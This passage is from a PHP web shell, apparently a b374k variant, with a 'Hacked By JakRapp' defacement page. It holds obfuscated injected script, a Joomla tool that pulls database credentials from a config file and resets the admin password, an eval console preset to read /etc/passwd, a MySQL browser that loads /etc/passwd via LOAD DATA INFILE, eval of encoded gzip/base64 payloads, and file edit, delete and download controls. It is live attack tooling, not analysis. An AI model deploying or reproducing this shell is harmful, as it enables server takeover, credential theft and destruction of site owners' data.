  3104. <meta content='index,follow' name='robots'/>
  3105. <meta content='text/html;charset=UTF-8' http-equiv='Content-Type'/>
  3106. <meta content='website' name='generator'/>
  3107. <meta content='general' name='rating'/>
  3108. <!-- SEO Title Tag -->
  3109. <title>Hacked By JakRapp</title>
  3110. <link href='http://www.jakrapp.com/favicon.ico' rel='icon' type='image/x-icon'/>
  3111. <meta content='text/html;charset=UTF-8' http-equiv='Content-Type'/>
  3112. <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'/>
  3113. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  3114. <meta content='Hacked By JakRapp' name='description'/>
  3115. <script src='http://code.jquery.com/jquery-latest.min.js'></script>
  3116.  
  3117. <style>
  3118. body{
  3119. font-family: 'courier new';
  3120. font-size:80%;
  3121. color: #28FE14;
  3122. background: url('http://2.bp.blogspot.com/-LPgZM8E1nKE/VA_RSPtWNvI/AAAAAAAAAu4/Dzs4tTNniFw/s1600/1w2w3.png') center fixed;
  3123. background-size: cover;
  3124. -webkit-background-size: cover;
  3125. -moz-background-size: cover;
  3126. -o-background-size: cover;
  3127. }
  3128. }
  3129.  
  3130. .xBody{
  3131. width:660px;
  3132. height:450px;
  3133. position:absolute;
  3134. z-index: 9;
  3135. }
  3136. .ssh{
  3137. display:none;
  3138. z-index: 9;
  3139. }
  3140. .sshBox{
  3141. height:300px;
  3142. border: 4px solid white;
  3143.         -moz-border-radius: 4px;
  3144.         -webkit-border-radius: 4px;
  3145.         -o-border-radius: 4x;
  3146.         -khtml-border-radius: 4px;
  3147.         border-radius: 4px;
  3148.         z-index: 9;
  3149. }
  3150. .sshHead{
  3151. margin-bottom: 5px;
  3152. color:black;
  3153. font-weight: bold;
  3154. background-color: white;
  3155. height:20px;
  3156. z-index: 9;
  3157.  
  3158. }
  3159.  
  3160. .greenBox{
  3161. padding-left: 3px;
  3162. position: absolute;
  3163. height:22px;
  3164. border: 1px solid #28FE14;
  3165. z-index: 9;
  3166. }
  3167. .picz{
  3168. position: absolute;
  3169. width:500px;
  3170. height:80%;
  3171. display:none;
  3172. right:2px;
  3173. top:2px;
  3174. }
  3175. #mg img:hover {
  3176. -webkit-animation:tremer 0.5s linear infinite;
  3177. -moz-animation:tremer 0.5s linear infinite;
  3178. -o-animation:tremer 0.5s linear infinite;
  3179. animation:tremer 0.5s linear infinite;
  3180. }
  3181. .neon{<!--coleur lootz-->
  3182. color:blue;
  3183. text-shadow: 0 0 5px red,0 0 10px red, 0 0 30px orange, 0 0 45px yellow, 0 0 60px red;
  3184. }
  3185. .like{border:4px double yellow;
  3186. box-shadow:0px 2px 20px white;
  3187. border-radius:10px;
  3188. padding:9px;
  3189. height:310px;}
  3190. #mg img{border:4px double yellow;
  3191.  
  3192. border-radius:10px;
  3193. opacity:0.75;
  3194. -moz-opacity: 0.75;
  3195. filter: alpha(opacity=75);
  3196. }
  3197. </style>
  3198. </head>
  3199. <body onselectstart='return false' ondragstart='return false' oncontextmenu='return false' onLoad='writetext()'>
  3200. <Script Language='Javascript'>
  3201. <!-- Lol Many scripts -->
  3202. <!--
  3203. document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%62%79%20%4D%61%72%6B%65%74%61%63%74%69%63%6F%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%35%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%34%43%25%36%31%25%36%45%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%44%25%32%37%25%34%41%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%37%25%33%45%25%30%41%25%33%43%25%32%31%25%32%44%25%32%44%25%32%30%25%34%38%25%35%34%25%34%44%25%34%43%25%32%30%25%34%35%25%36%45%25%36%33%25%37%32%25%37%39%25%37%30%25%37%34%25%36%39%25%36%46%25%36%45%25%32%30%25%36%32%25%37%39%25%32%30%25%34%44%25%36%31%25%37%32%25%36%42%25%36%35%25%37%34%25%36%31%25%36%33%25%37%34%25%36%39%25%36%33%25%36%46%25%32%45%25%36%33%25%36%46%25%36%44%25%32%30%25%32%44%25%32%44%25%33%45%25%30%41%25%33%43%25%32%31%25%32%44%25%32%44%25%30%41%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%37%35%25%36%45%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%32%37%25%32%35%25%33%33%25%34%33%25%32%35%25%33%36%25%33%32%25%32%35%25%33%36%25%34%36%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%34%36%25%32%35%25%33%36%25%34%35%25%32%35%25%33%36%25%34%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%34%36%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%34%35%25%32%35%25%33%33%25%34%34%25%32%35%25%33%32%25%33%32%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%34%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%30%25%34%31%25%32%37%25%32%39%25%32%39%25%33%42%25%30%41%25%32%46%25%32%46%25%32%44%25%32%44%25%33%45%25%30%41%25%33%43%25%32%46%25%35%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%53%63%72%69%70%74%3E'));
  3204. //-->
  3205. </Script>
  3206. <p>
  3207. <p>
  3208. <br>
  3209. <b><font color='blue' face='consolas' size='4'>
  3210. <p align='center' class='style2'><font face='Trajan Pro' size='10' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>Hacked By JakRapp</font><p>
  3211. <font color='blue' face='consolas' size='4'>
  3212. <p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b>./Jaka_Attacker ~ UstadzJaka ~ ./Zonkk ~ Jack D'Ripper ~ ./KLEMEZ<p></font>
  3213. <font color='blue' face='consolas' size='4'>
  3214. <center><p align='center' class='style2'><font face='Trajan Pro' size='4' color='RED' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='WHITE'>
  3215. -=[[ Pasukan Berani Mati REBORN ]]=-<P>-=| GRETZ IDBTE4M | GOENK TEA | ./HDV | ADRIAN XDA | DIDOT | POETRA D`M | JACK D`RIPPER | DAY IDBTE4M | DIMAZ BN |=- <P>
  3216. -=| DEMONK | KHUNAY | MR-AQ | HENDRA D`N | PETAPA GENIT | KODRAT | MUZZAM | MAULANA | SIRIN |=-
  3217. </font><p></center>
  3218. <center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>My Friends : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code> Kefiex404 ~ FadliDotID_007 ~ ./elro-BN404 ~ k3c0t ~ RT05 ~ 4Z1S ~ Mr.Optimuz_r00t ~ Anzhi72 ~ NyengatGetar ~ CaFc_Br40ck ~ Hmei7 ~ ./S3mR4k4T ~ Mr.AchanX48 ~ ./Na-z ~ ./Ghost-Priox ~ Mr.Hari ~ 1n51d3r ~ M0NST3R-P1NK ~ LDera ~ nemat0da ~ b0L4ng ~ HYTHAN7 ~ M0NST3R-P1NK ~ AldiDotPhp ~ USTADCAGE_48</code></marquee></font></td></tr></table><html><center>
  3219.  
  3220. <embed src='http://www.youtube.com/v/oWqWNMNFZlU&autoplay=1' type='application/x-shockwave-flash' wmode='transparent' width='1' height='1'></embed>
  3221. </body>
  3222. </html>
  3223.  
  3224. <?php
  3225. }
  3226. //////////////////////////////////////////////////////////////////////////////
  3227.  
  3228. ?>
  3229.  
  3230. <?php
  3231. if (isset($_GET['jak']) && ($_GET['jak'] == 'jomla')) {
  3232. ?>
  3233. <form action="?&amp;jak=jomla" method="post">
  3234. <?php  
  3235. error_reporting(0);
  3236.     if($_POST){
  3237.  
  3238.         function jipukteks($param, $kata1, $kata2){
  3239.     if(strpos($param, $kata1) === FALSE) return FALSE;
  3240.     if(strpos($param, $kata2) === FALSE) return FALSE;
  3241.     $start = strpos($param, $kata1) + strlen($kata1);
  3242.     $end = strpos($param, $kata2, $start);
  3243.     $return = substr($param, $start, $end - $start);
  3244.     return $return;
  3245. }
  3246.  
  3247.     function anucurl($sites){
  3248.         $ch1 = curl_init ("$sites");
  3249. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  3250. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  3251. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3252. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  3253. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  3254. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  3255. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  3256. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  3257. $data = curl_exec ($ch1);
  3258. return $data;
  3259.     }
  3260.  
  3261. function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
  3262.     $post2 = array(
  3263.                     "username" => "$fak1",
  3264.                     "passwd" => "$fak2",
  3265.                     "lang" => "en-GB",
  3266.                     "option" => "com_login",
  3267.                     "task" => "login",
  3268.                     "return" => "$fak3",
  3269.                     "$fak4" => "1",
  3270.                    
  3271.                     );
  3272. $ch = curl_init ("$cek");
  3273. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  3274. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  3275. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3276. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3277. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3278. curl_setopt ($ch, CURLOPT_POST, 1);
  3279. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  3280. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  3281. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  3282. $data6 = curl_exec ($ch);
  3283. return $data6;
  3284.     }
  3285.  
  3286.         $link = $_POST['link'];
  3287.         if($link==""){
  3288.             echo "Report: <br>";
  3289.             echo "-> Link Config anda belum terisi <-";
  3290.         }
  3291.         else{
  3292.  
  3293.         $file = anucurl($link);
  3294.  
  3295.                     $host = jipukteks($file,"smtphost = '","'");
  3296.                     $username = jipukteks($file,"user = '","'");
  3297.                     $password = jipukteks($file,"password = '","'");
  3298.                     $db = jipukteks($file,"db = '","'");
  3299.                     $dbprefix = jipukteks($file,"dbprefix = '","'");
  3300.                     $user_baru = "admin";
  3301.                     $password_baru = "kefiex";
  3302.                     $prefix = $dbprefix."users";
  3303.                     $pass = md5("$password_baru");
  3304.                     $serah = $db.".".$dbprefix;
  3305.                    
  3306.  
  3307.                     echo "<font color='#C6C646'>Database Content :</font><br>";
  3308.                     echo "Db Host&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$host</font><br>";
  3309.                     echo "Db user&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$username</font><br>";
  3310.                     echo "Db Password &nbsp: <font color='green'>$password</font><br>";
  3311.                     echo "Db name&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$db</font><br>";
  3312.                     echo "Table_Prefix &nbsp&nbsp: <font color='green'>$dbprefix</font><br>";        
  3313.  
  3314.         mysql_connect($host,$username,$password) or die("<br><font color='red'>Gagal Terkoneksi Ke Database ...</font>");
  3315.         mysql_select_db($db) or die("<font color='red'>Database tidak bisa dibuka ...</font>");
  3316.  
  3317.         $show=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3318.     $r=mysql_fetch_array($show);
  3319.         $id = $r[id];
  3320.        
  3321.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
  3322. $utama = "$link";
  3323. $kedua = @file_get_contents($utama);
  3324. if(preg_match("askdasldasdlja12123",$kedua)){
  3325.                         echo "# <font color='green'>berhasil rubah password</font><br>";
  3326.                         echo "# $utama<br>";
  3327.                        
  3328.                     }
  3329.                     else{
  3330.                         echo "<br># <font color='green'>Pasword berhasil dirubah: </font><br>";
  3331.                         echo "Username: <font color='#C6C646'>$user_baru</font><br>";
  3332.                         echo "Password: <font color='#C6C646'>$password_baru</font><br>";
  3333.  
  3334.                        
  3335.                     }
  3336.                 }
  3337.  
  3338.  
  3339.  
  3340.  
  3341.     }else{
  3342.             echo '<html>
  3343.            <body>
  3344.            <center>
  3345.                <center><br><span style="font-size:1.6em;"> .: Joomla Password Reset | Tools :. </span><br>Coded by Bl4ckcod37</center><br>
  3346.                        <table>
  3347.                            <tr><td><form method="post"></td></tr>
  3348.                            <tr><td><input class="inputz" size=50 type="text" name="link" placeholder="masukkan link config disini"></td></tr>
  3349.  
  3350.                            <tr><td>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input
  3351. class="inputz" type="submit" value="Reset"></td></tr>
  3352.                            </form>
  3353.                        </table>
  3354.                        
  3355.            </center>
  3356.  
  3357.    </body>
  3358. </html><br><br><br><br>';
  3359.         }
  3360. }
  3361.     ?>
  3362.  
  3363.     </div></div></div></div></div></div>
  3364. <?php
  3365.     if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  3366.     <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  3367.     <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
  3368.     else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
  3369.     <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
  3370.     <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
  3371.     if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
  3372.     $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
  3373.     if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  3374.     $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  3375.     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db']))
  3376.     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  3377.     if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  3378.     $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  3379.     $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
  3380.     $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
  3381.     $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
  3382.     $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
  3383.     foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
  3384.     elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
  3385.     $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
  3386.     $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
  3387.     if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  3388.     for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
  3389.     if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
  3390.     if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  3391.     $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
  3392.     <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  3393.     <input type="hidden" name="x" value="mysql" />
  3394.     <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
  3395.     <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
  3396.     <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
  3397.     <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
  3398.     <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
  3399.     <?php }}
  3400.     elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
  3401.     elseif(isset($_GET['jak']) && ($_GET['jak'] == 'jump')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
  3402.     elseif(isset($_GET['jak']) && ($_GET['jak'] == 'wpp')){ @eval(gzinflate(base64_decode($wpress))); "</div>"; }
  3403.    
  3404.     elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> ";
